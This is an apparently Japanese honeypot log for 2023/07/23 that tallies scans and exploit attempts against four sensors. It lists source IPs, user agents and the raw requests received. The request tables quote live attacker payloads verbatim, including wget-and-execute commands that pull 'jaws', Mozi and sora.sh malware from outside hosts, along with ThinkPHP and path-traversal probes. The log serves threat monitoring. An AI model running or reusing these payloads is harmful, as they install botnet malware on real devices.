ハニーポット(仮) 観測記録 2023/07/23分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
Location:UK
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
.jsへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212.8.251.176/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget testbots.maizhangyu.top/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:111 (前日比:10)
US:総アクセス数:107 (前日比:-19)
UK:総アクセス数:85 (前日比:-6)
SG:総アクセス数:88 (前日比:1)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.239.123.85 | United States |
2 | 13.40.27.79 | United States |
2 | 13.40.69.225 | United States |
2 | 18.130.71.81 | United States |
1 | 18.234.223.50 | United States |
1 | 20.172.37.23 | United States |
1 | 41.40.189.127 | Egypt |
1 | 41.47.175.13 | Egypt |
14 | 43.154.141.71 | Singapore |
1 | 45.12.253.165 | Bulgaria |
1 | 45.33.80.243 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.172.21 | United States |
1 | 45.80.158.109 | Netherlands |
1 | 45.128.232.62 | Bulgaria |
1 | 45.128.232.176 | Bulgaria |
2 | 51.89.158.69 | France |
1 | 59.96.24.148 | India |
1 | 64.62.197.34 | United States |
1 | 64.62.197.40 | United States |
1 | 64.62.197.224 | United States |
1 | 82.102.23.117 | United Kingdom |
5 | 95.214.27.131 | Bulgaria |
1 | 95.214.27.191 | Bulgaria |
1 | 104.192.0.50 | United States |
1 | 105.113.16.173 | Nigeria |
2 | 107.6.112.252 | United States |
1 | 107.170.240.42 | United States |
1 | 107.170.253.21 | United States |
2 | 109.237.97.180 | Russia |
1 | 122.140.140.48 | China |
5 | 128.199.93.49 | United Kingdom |
8 | 135.125.217.54 | France |
8 | 135.125.246.110 | France |
1 | 156.222.238.19 | Egypt |
2 | 159.203.24.40 | United States |
1 | 162.142.125.12 | United States |
1 | 162.142.125.14 | United States |
1 | 162.243.131.30 | United States |
1 | 162.243.134.13 | United States |
1 | 162.244.210.240 | Canada |
2 | 164.92.148.216 | United States |
1 | 167.99.185.90 | United States |
2 | 170.64.134.89 | United States |
2 | 172.104.11.46 | United States |
1 | 178.72.69.206 | Russia |
1 | 185.180.143.80 | Portugal |
1 | 185.180.143.189 | Portugal |
3 | 185.254.196.173 | Ukraine |
4 | 185.254.196.186 | Ukraine |
1 | 188.166.154.2 | United States |
1 | 192.241.227.55 | United States |
1 | 192.241.236.66 | United States |
1 | 197.62.65.115 | Egypt |
1 | 205.210.31.146 | United States |
1 | 205.210.31.209 | United States |
4 | 207.90.244.10 | United States |
1 | 218.145.61.20 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
28 | - |
2 | Go-http-client/1.1 |
1 | Hakai/2.0 |
6 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
31 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
7 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
1 | Python-urllib/3.9 |
1 | python-requests/2.25.1 |
1 | python-requests/2.28.1 |
1 | python-requests/2.31.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfa\x01 |
||
9 | \x16\x03\x01 |
||
6 | `` | ||
1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
31 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
3 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.svn/wc.db |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
2 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /aaa9 |
HTTP/1.1 |
1 | GET | /aab8 |
HTTP/1.1 |
2 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
8 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
2 | GET | /hudson |
HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http[:]//114[.]67[.]217[.]170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sendgrid/.env |
HTTP/1.1 |
5 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
2 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /v3/time |
HTTP/1.1 |
14 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 14.18.80.3 | China |
2 | 18.130.225.117 | United States |
1 | 36.32.2.101 | China |
1 | 41.43.25.157 | Egypt |
1 | 45.79.172.21 | United States |
1 | 45.79.181.179 | United States |
1 | 45.88.90.144 | Bulgaria |
1 | 45.128.232.62 | Bulgaria |
1 | 45.128.232.176 | Bulgaria |
1 | 47.251.14.232 | United States |
1 | 47.251.15.21 | United States |
21 | 54.37.79.75 | France |
1 | 54.194.205.29 | United States |
2 | 64.227.146.243 | United States |
1 | 66.175.213.4 | United States |
1 | 92.118.39.83 | Romania |
1 | 104.28.226.8 | United States |
1 | 107.170.229.5 | United States |
1 | 107.170.234.21 | United States |
1 | 107.170.250.29 | United States |
2 | 107.172.233.136 | United States |
2 | 109.237.98.235 | Russia |
2 | 128.199.93.49 | United Kingdom |
1 | 134.209.218.37 | United States |
1 | 138.68.190.255 | United States |
2 | 139.59.37.187 | Singapore |
6 | 148.153.45.236 | United States |
1 | 152.136.194.52 | China |
1 | 156.195.205.202 | Egypt |
1 | 156.219.82.61 | Egypt |
1 | 156.223.14.86 | Egypt |
2 | 162.142.125.224 | United States |
1 | 162.243.147.17 | United States |
1 | 162.243.152.5 | United States |
6 | 164.92.148.216 | United States |
2 | 167.94.146.58 | United States |
1 | 167.99.189.205 | United States |
1 | 172.104.11.34 | United States |
2 | 172.105.128.12 | United States |
1 | 172.105.128.13 | United States |
2 | 184.105.247.194 | United States |
1 | 185.156.72.26 | Russia |
1 | 185.180.143.50 | Portugal |
1 | 185.224.128.151 | Netherlands |
1 | 192.155.90.118 | United States |
1 | 192.155.90.220 | United States |
1 | 192.241.192.13 | United States |
1 | 192.241.194.54 | United States |
1 | 192.241.216.29 | United States |
1 | 193.35.18.253 | Bulgaria |
1 | 194.165.16.37 | Panama |
1 | 194.165.17.11 | Panama |
1 | 197.53.237.59 | Egypt |
1 | 198.199.102.40 | United States |
12 | 213.109.202.66 | United Kingdom |
1 | 216.218.206.68 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
29 | - |
2 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 |
6 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
11 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
1 | python-requests/2.25.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | MGLNDD_34.68.118.83_80\n |
||
3 | \x03 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
13 | \x16\x03\x01 |
||
2 | `` | ||
1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
25 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /3Opk |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /DcEp |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /aaa9 |
HTTP/1.1 |
3 | GET | /aab8 |
HTTP/1.1 |
1 | GET | /aab9 |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /app |
HTTP/1.1 |
1 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
2 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /geoserver |
HTTP/1.1 |
2 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /jquery-3.3.1.slim.min.js |
HTTP/1.1 |
1 | GET | /jquery-3.3.2.slim.min.js |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
6 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /static/admin/javascript/hetong.js |
HTTP/1.1 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /goform/formJsonAjaxReq |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
16 | 3.9.173.228 | United States |
2 | 18.130.239.205 | United States |
1 | 36.225.129.2 | Taiwan |
2 | 45.33.80.243 | United States |
2 | 45.79.172.21 | United States |
2 | 45.79.181.94 | United States |
1 | 45.79.181.104 | United States |
1 | 45.227.254.55 | Belize |
1 | 47.88.94.28 | United States |
1 | 47.254.25.10 | United States |
7 | 54.37.79.75 | France |
1 | 92.118.39.83 | Romania |
1 | 103.230.227.57 | India |
1 | 104.28.226.8 | United States |
1 | 106.52.121.158 | China |
1 | 107.170.224.62 | United States |
1 | 107.170.240.28 | United States |
1 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
2 | 109.237.98.235 | Russia |
1 | 111.224.248.4 | China |
2 | 157.230.99.133 | United States |
2 | 157.230.99.148 | United States |
1 | 162.243.148.4 | United States |
1 | 167.99.91.165 | United States |
2 | 167.248.133.36 | United States |
1 | 172.104.11.4 | United States |
2 | 172.104.11.46 | United States |
1 | 172.105.128.12 | United States |
1 | 176.125.228.22 | Romania |
1 | 184.105.139.67 | United States |
2 | 184.105.247.195 | United States |
2 | 185.156.72.32 | Russia |
1 | 185.170.144.3 | Estonia |
1 | 185.180.143.48 | Portugal |
1 | 185.180.143.80 | Portugal |
2 | 185.224.128.151 | Netherlands |
1 | 185.233.19.231 | United States |
1 | 192.155.90.220 | United States |
1 | 192.241.193.50 | United States |
1 | 192.241.202.71 | United States |
1 | 192.241.218.44 | United States |
1 | 192.241.229.23 | United States |
1 | 193.35.18.253 | Bulgaria |
1 | 194.165.17.11 | Panama |
1 | 197.57.61.224 | Egypt |
1 | 198.199.118.19 | United States |
1 | 198.235.24.169 | United States |
1 | 199.254.199.239 | United States |
1 | 213.108.199.49 | Seychelles |
1 | 222.90.212.243 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | 'Cloud mapping experiment. Contact research@pdrlabs.net' |
40 | - |
4 | FooBarTest |
3 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
11 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
7 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | MGLNDD_132.145.66.34_80\n |
||
5 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfc\x01 |
||
23 | \x16\x03\x01 |
||
4 | `` | ||
1 | i4\xc1\xc7\b\xe0\xeb\bI\xd9T7\x93~\xa4\xfe\xcez\xcf\v\xc1t\xe4X1\xe8\xcb\xba\xc3\xccBq\x8a\xea\xefg\x7fM\xb0\x12\x04\xe3U<O\x86IDNp?\xd9\x86C\x16\xa3\xf2\x85 |
||
1 | CONNECT | tls[.]mrrage[.]xyz:443 |
HTTP/1.1 |
2 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
1 | GET | /+CSCOE+/logon.html |
HTTP/1.1 |
12 | GET | /.env |
HTTP/1.1 |
1 | GET | /?act=cl&ofid=9999999&uid=1&vid=1&lid=1&cid=1&pid=1_mt |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/index.html |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/login.cgi |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
8 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.html |
HTTP/1.1 |
1 | GET | /manage/account/login |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
1 | GET | /static/admin/javascript/hetong.js |
HTTP/1.1 |
4 | GET | http[:]//test[.]getproxylist[.]com/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.202.114.143 | China |
1 | 20.98.46.136 | United States |
1 | 35.177.199.177 | United States |
1 | 39.104.65.159 | China |
4 | 43.129.219.189 | Singapore |
1 | 45.33.80.243 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.128.205 | United States |
3 | 45.79.181.94 | United States |
1 | 45.79.181.104 | United States |
1 | 45.128.232.62 | Bulgaria |
1 | 45.156.129.7 | Hungary |
12 | 51.79.29.48 | Canada |
1 | 51.159.164.227 | France |
1 | 52.56.146.174 | United States |
1 | 64.62.197.33 | United States |
1 | 64.62.197.44 | United States |
1 | 66.240.192.82 | United States |
1 | 80.66.88.215 | Russia |
1 | 105.113.16.32 | Nigeria |
1 | 107.170.234.6 | United States |
1 | 107.170.254.24 | United States |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
2 | 109.237.98.235 | Russia |
1 | 120.211.145.96 | China |
1 | 138.68.156.187 | United States |
2 | 156.199.67.23 | Egypt |
1 | 159.203.208.19 | United States |
2 | 162.142.125.11 | United States |
1 | 162.243.140.21 | United States |
1 | 162.243.151.36 | United States |
1 | 162.244.210.240 | Canada |
2 | 172.104.11.4 | United States |
2 | 172.105.128.12 | United States |
1 | 172.105.128.13 | United States |
2 | 185.156.72.32 | Russia |
1 | 185.180.143.189 | Portugal |
2 | 185.224.128.151 | Netherlands |
1 | 185.233.19.236 | United States |
1 | 192.155.90.118 | United States |
1 | 192.241.200.71 | United States |
1 | 192.241.239.16 | United States |
1 | 193.35.18.253 | Bulgaria |
1 | 197.42.77.135 | Egypt |
1 | 198.199.97.121 | United States |
1 | 199.254.199.239 | United States |
1 | 205.210.31.12 | United States |
1 | 205.210.31.228 | United States |
1 | 213.108.199.49 | Seychelles |
12 | 213.109.202.66 | United Kingdom |
1 | 216.218.206.68 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
37 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
17 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
7 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
2 | MGLNDD_13.67.44.234_80 |
||
3 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
18 | \x16\x03\x01 |
||
1 | \xff\xa2\xff |
||
2 | `` | ||
1 | o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f |
||
1 | CONNECT | tls[.]mrrage[.]xyz:443 |
HTTP/1.1 |
2 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
17 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?act=cl&ofid=9999999&uid=1&vid=1&lid=1&cid=1&pid=1_mt |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
7 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /geoserver |
HTTP/1.1 |
2 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws;sh+/tmp/jaws |
|
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |